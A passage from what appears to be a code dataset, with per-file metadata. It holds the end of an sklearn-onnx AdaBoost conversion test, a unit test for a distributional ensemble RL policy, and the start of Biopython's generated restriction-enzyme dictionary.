"< StrictVersion('0.5.0') or "
"StrictVersion(onnx.__version__) "
"== StrictVersion('1.4.1')",
verbose=False
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnxruntime.__version__) <
StrictVersion("0.5.9999")),
reason="not available")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_regressor_lr11(self):
model, X = fit_regression_model(
AdaBoostRegressor(learning_rate=0.5, random_state=42))
if onnx_opset_version() < 11:
try:
convert_sklearn(
model, "AdaBoost regression",
[("input", FloatTensorType([None, X.shape[1]]))])
except RuntimeError:
return
model_onnx = convert_sklearn(
model, "AdaBoost regression",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=TARGET_OPSET)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnAdaBoostRegressorLR-Dec4",
allow_failure="StrictVersion("
"onnxruntime.__version__) "
"< StrictVersion('0.5.9999') or "
"StrictVersion(onnx.__version__) "
"== StrictVersion('1.4.1')",
verbose=False
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_regressor_bool(self):
model, X = fit_regression_model(
AdaBoostRegressor(learning_rate=0.5, random_state=42),
is_bool=True)
model_onnx = convert_sklearn(
model, "AdaBoost regression",
[("input", BooleanTensorType([None, X.shape[1]]))],
target_opset=10,
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnAdaBoostRegressorBool",
allow_failure="StrictVersion("
"onnxruntime.__version__) "
"< StrictVersion('0.5.0') or "
"StrictVersion(onnx.__version__) "
"== StrictVersion('1.4.1')",
verbose=False,
)
if __name__ == "__main__":
unittest.main()
| 37.989744 | 72 | 0.575459 | 1,365 | 14,816 | 5.903297 | 0.098901 | 0.043559 | 0.05659 | 0.087242 | 0.845619 | 0.842144 | 0.833954 | 0.828866 | 0.815463 | 0.762472 | 0 | 0.021761 | 0.31763 | 14,816 | 389 | 73 | 38.087404 | 0.775272 | 0.002362 | 0 | 0.732432 | 0 | 0 | 0.182556 | 0.09324 | 0 | 0 | 0 | 0 | 0.035135 | 1 | 0.035135 | false | 0 | 0.032432 | 0 | 0.072973 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d4b6bbf7858dfd7d4372a2f3ac35840bbf24f4b2 | 3,800 | py | Python | tests/test_distributional_ensemble_policy.py | carljohanhoel/EnsembleQuantileNetworks | 7dfbed562f3e0c7552fa98a821db502ea565618c | [
"MIT"
] | 9 | 2021-05-29T14:55:27.000Z | 2022-03-08T11:19:44.000Z | tests/test_distributional_ensemble_policy.py | carljohanhoel/EnsembleQuantileNetworks | 7dfbed562f3e0c7552fa98a821db502ea565618c | [
"MIT"
] | 1 | 2021-09-27T08:59:43.000Z | 2022-01-13T14:13:03.000Z | tests/test_distributional_ensemble_policy.py | carljohanhoel/EnsembleQuantileNetworks | 7dfbed562f3e0c7552fa98a821db502ea565618c | [
"MIT"
] | 1 | 2022-02-03T14:17:36.000Z | 2022-02-03T14:17:36.000Z | import unittest
import numpy as np
import sys
sys.path.append('../src')
from policy import DistributionalEnsembleTestPolicy
class Tester(unittest.TestCase):
def test_standard(self):
policy = DistributionalEnsembleTestPolicy()
for i in range(0, 100):
z_values_all_nets = np.random.rand(10, 32, 4)
z_values_all_nets[:, :, 0] += 1 # Action 0 should then be 'best'
action, policy_info = policy.select_action(z_values_all_nets=z_values_all_nets)
self.assertEqual(action, 0)
# Test for batch
z_values_all_nets = np.random.rand(32, 10, 32, 4)
best_idx = np.random.randint(0, 4, 32)
for batch in range(0, 32):
idx = best_idx[batch]
z_values_all_nets[batch, :, :, idx] += 1
action, policy_info = policy.select_action(z_values_all_nets=z_values_all_nets)
self.assertTrue((action == best_idx).all())
def test_safe_policy(self):
policy = DistributionalEnsembleTestPolicy(aleatoric_threshold=0.1)
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[..., 2] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 2)
self.assertFalse(policy_info['safe_action'])
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[0:5, :, 2] *= 100
z_values_all_nets[..., 3] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 2)
self.assertFalse(policy_info['safe_action'])
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[:, 0:10, 2] *= 100
z_values_all_nets[..., 3] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 4)
self.assertTrue(policy_info['safe_action'])
policy = DistributionalEnsembleTestPolicy(epistemic_threshold=0.1)
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[..., 2] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 2)
self.assertFalse(policy_info['safe_action'])
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[:, 0:10, 2] *= 100
z_values_all_nets[..., 3] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 2)
self.assertFalse(policy_info['safe_action'])
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[0:5, :, :2] *= 100
z_values_all_nets[..., 3] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 4)
self.assertTrue(policy_info['safe_action'])
policy = DistributionalEnsembleTestPolicy(aleatoric_threshold=0.1, epistemic_threshold=0.1)
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[..., 2] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 2)
self.assertFalse(policy_info['safe_action'])
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[:, 0:10, 2] *= 100
z_values_all_nets[..., 3] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 4)
self.assertTrue(policy_info['safe_action'])
z_values_all_nets = np.ones([10, 32, 4])
z_values_all_nets[0:5, :, :2] *= 100
z_values_all_nets[..., 3] *= 1.001
action, policy_info = policy.select_action(z_values_all_nets)
self.assertEqual(action, 4)
self.assertTrue(policy_info['safe_action'])
if __name__ == '__main__':
unittest.main()
| 40 | 99 | 0.645263 | 535 | 3,800 | 4.24486 | 0.11215 | 0.126376 | 0.180537 | 0.252752 | 0.837517 | 0.825627 | 0.796125 | 0.765742 | 0.756935 | 0.756935 | 0 | 0.059447 | 0.229737 | 3,800 | 94 | 100 | 40.425532 | 0.716433 | 0.011842 | 0 | 0.675325 | 0 | 0 | 0.030117 | 0 | 0 | 0 | 0 | 0 | 0.25974 | 1 | 0.025974 | false | 0 | 0.051948 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d4d5d9df6497b27b3f1c637c5fe8bb3e160a1542 | 538,893 | py | Python | Bio/Restriction/Restriction_Dictionary.py | gtsueng/biopython | 4b2adc9f52ae1eda123744a8f4af7c2150505de1 | [
"BSD-3-Clause"
] | 2 | 2020-08-25T13:55:00.000Z | 2020-08-25T16:36:03.000Z | Bio/Restriction/Restriction_Dictionary.py | gtsueng/biopython | 4b2adc9f52ae1eda123744a8f4af7c2150505de1 | [
"BSD-3-Clause"
] | 1 | 2020-04-25T20:36:07.000Z | 2020-04-25T20:36:07.000Z | site-packages/Bio/Restriction/Restriction_Dictionary.py | Wristlebane/Pyto | 901ac307b68486d8289105c159ca702318bea5b0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Copyright (C) 2004. Frederic Sohm.
#
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
#
# This file is automatically generated - do not edit it by hand! Instead,
# use the tool Scripts/Restriction/ranacompiler.py which in turn uses
# Scripts/Restriction/rebase_update.py and Bio/Restriction/RanaConfig.py
"""Restriction Analysis Libraries.
The following dictionaries used to be defined in one go, but that does
not work on Jython due to JVM limitations. Therefore we break this up
into steps, using temporary functions to avoid the JVM limits.
Used REBASE emboss files version 905 (2019).
"""
rest_dict = {}
def _temp():
return {
'charac': (3, -3, None, None, 'TTATAA'),
'compsite': '(?=(?P<AanI>TTATAA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTATAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AanI'] = _temp()
def _temp():
return {
'charac': (11, 8, None, None, 'CACCTGC'),
'compsite': '(?=(?P<AarI>CACCTGC))|(?=(?P<AarI_as>GCAGGTG))',
'dna': None,
'freq': 16384.0,
'fst3': 8,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACCTGC',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AarI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'GACNNNNNNGTC'),
'compsite': '(?=(?P<AasI>GAC......GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNNGTC',
'size': 12,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AasI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GACGTC'),
'compsite': '(?=(?P<AatII>GACGTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'ACGT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACGTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'I', 'K', 'M', 'N', 'V'),
}
rest_dict['AatII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CRRTAAG'),
'compsite': '(?=(?P<Aba6411II>C[AG][AG]TAAG))|(?=(?P<Aba6411II_as>CTTA[CT][CT]G))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRRTAAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Aba6411II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CATTAG'),
'compsite': '(?=(?P<AbaB8342IV>CATTAG))|(?=(?P<AbaB8342IV_as>CTAATG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATTAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AbaB8342IV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTATCAV'),
'compsite': '(?=(?P<AbaCIII>CTATCA[ACG]))|(?=(?P<AbaCIII_as>[CGT]TGATAG))',
'dna': None,
'freq': 5461.333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTATCAV',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AbaCIII'] = _temp()
def _temp():
return {
'charac': (12, 9, None, None, 'C'),
'compsite': '(?=(?P<AbaSI>C))|(?=(?P<AbaSI_as>G))',
'dna': None,
'freq': 4.0,
'fst3': 9,
'fst5': 12,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'C',
'size': 1,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AbaSI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'YCCGSS'),
'compsite': '(?=(?P<AbaUMB2I>[CT]CCG[CG][CG]))|(?=(?P<AbaUMB2I_as>[CG][CG]CGG[AG]))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'YCCGSS',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AbaUMB2I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTCGAGG'),
'compsite': '(?=(?P<AbsI>CCTCGAGG))',
'dna': None,
'freq': 65536.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TCGA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTCGAGG',
'size': 8,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AbsI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TGCGCA'),
'compsite': '(?=(?P<Acc16I>TGCGCA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGCGCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Acc16I'] = _temp()
def _temp():
return {
'charac': (10, 8, None, None, 'ACCTGC'),
'compsite': '(?=(?P<Acc36I>ACCTGC))|(?=(?P<Acc36I_as>GCAGGT))',
'dna': None,
'freq': 4096.0,
'fst3': 8,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCTGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Acc36I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGTACC'),
'compsite': '(?=(?P<Acc65I>GGTACC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTACC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'I', 'N', 'V'),
}
rest_dict['Acc65I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GACGCA'),
'compsite': '(?=(?P<Acc65V>GACGCA))|(?=(?P<Acc65V_as>TGCGTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACGCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Acc65V'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGYRCC'),
'compsite': '(?=(?P<AccB1I>GG[CT][AG]CC))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GYRC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGYRCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AccB1I'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCANNNNNTGG'),
'compsite': '(?=(?P<AccB7I>CCA.....TGG))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCANNNNNTGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AccB7I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CCGCTC'),
'compsite': '(?=(?P<AccBSI>CCGCTC))|(?=(?P<AccBSI_as>GAGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AccBSI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GTMKAC'),
'compsite': '(?=(?P<AccI>GT[AC][GT]AC))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'MK',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTMKAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'M', 'N', 'Q', 'R', 'X'),
}
rest_dict['AccI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCG'),
'compsite': '(?=(?P<AccII>CGCG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCG',
'size': 4,
'substrat': 'DNA',
'suppl': ('J', 'K'),
}
rest_dict['AccII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<AccIII>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'K', 'R'),
}
rest_dict['AccIII'] = _temp()
def _temp():
return {
'charac': (13, 11, None, None, 'CAGCTC'),
'compsite': '(?=(?P<AceIII>CAGCTC))|(?=(?P<AceIII_as>GAGCTG))',
'dna': None,
'freq': 4096.0,
'fst3': 11,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AceIII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGCCAG'),
'compsite': '(?=(?P<AchA6III>AGCCAG))|(?=(?P<AchA6III_as>CTGGCT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AchA6III'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCGC'),
'compsite': '(?=(?P<AciI>CCGC))|(?=(?P<AciI_as>GCGG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AciI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'AACGTT'),
'compsite': '(?=(?P<AclI>AACGTT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AACGTT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N', 'V'),
}
rest_dict['AclI'] = _temp()
def _temp():
return {
'charac': (9, 5, None, None, 'GGATC'),
'compsite': '(?=(?P<AclWI>GGATC))|(?=(?P<AclWI_as>GATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AclWI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCRGAG'),
'compsite': '(?=(?P<Aco12261II>CC[AG]GAG))|(?=(?P<Aco12261II_as>CTC[CT]GG))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCRGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Aco12261II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'YGGCCR'),
'compsite': '(?=(?P<AcoI>[CT]GGCC[AG]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YGGCCR',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AcoI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TAGCRAB'),
'compsite': '(?=(?P<AcoY31II>TAGC[AG]A[CGT]))|(?=(?P<AcoY31II_as>[ACG]T[CT]GCTA))',
'dna': None,
'freq': 2730.6666666666665,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TAGCRAB',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AcoY31II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RAATTY'),
'compsite': '(?=(?P<AcsI>[AG]AATT[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RAATTY',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AcsI'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTGAAG'),
'compsite': '(?=(?P<AcuI>CTGAAG))|(?=(?P<AcuI_as>CTTCAG))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['AcuI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTG'),
'compsite': '(?=(?P<AcvI>CACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['AcvI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GRCGYC'),
'compsite': '(?=(?P<AcyI>G[AG]CG[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRCGYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('J',),
}
rest_dict['AcyI'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'CACNNNGTG'),
'compsite': '(?=(?P<AdeI>CAC...GTG))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACNNNGTG',
'size': 9,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AdeI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAANCAG'),
'compsite': '(?=(?P<Adh6U21I>GAA.CAG))|(?=(?P<Adh6U21I_as>CTG.TTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAANCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Adh6U21I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GTAC'),
'compsite': '(?=(?P<AfaI>GTAC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTAC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['AfaI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGCGCT'),
'compsite': '(?=(?P<AfeI>AGCGCT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCGCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['AfeI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCNNNNNNNGG'),
'compsite': '(?=(?P<AfiI>CC.......GG))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNNNNNNGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['AfiI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTTAAG'),
'compsite': '(?=(?P<AflII>CTTAAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TTAA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTAAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'K', 'N'),
}
rest_dict['AflII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACRYGT'),
'compsite': '(?=(?P<AflIII>AC[AG][CT]GT))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CRYG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACRYGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('M', 'N', 'S'),
}
rest_dict['AflIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCGGT'),
'compsite': '(?=(?P<AgeI>ACCGGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCGGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'N', 'R'),
}
rest_dict['AgeI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TTSAA'),
'compsite': '(?=(?P<AgsI>TT[CG]AA))',
'dna': None,
'freq': 512.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'S',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTSAA',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AgsI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TTTAAA'),
'compsite': '(?=(?P<AhaIII>TTTAAA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTTAAA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AhaIII'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'GACNNNNNGTC'),
'compsite': '(?=(?P<AhdI>GAC.....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNGTC',
'size': 11,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AhdI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACTAGT'),
'compsite': '(?=(?P<AhlI>ACTAGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTAGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
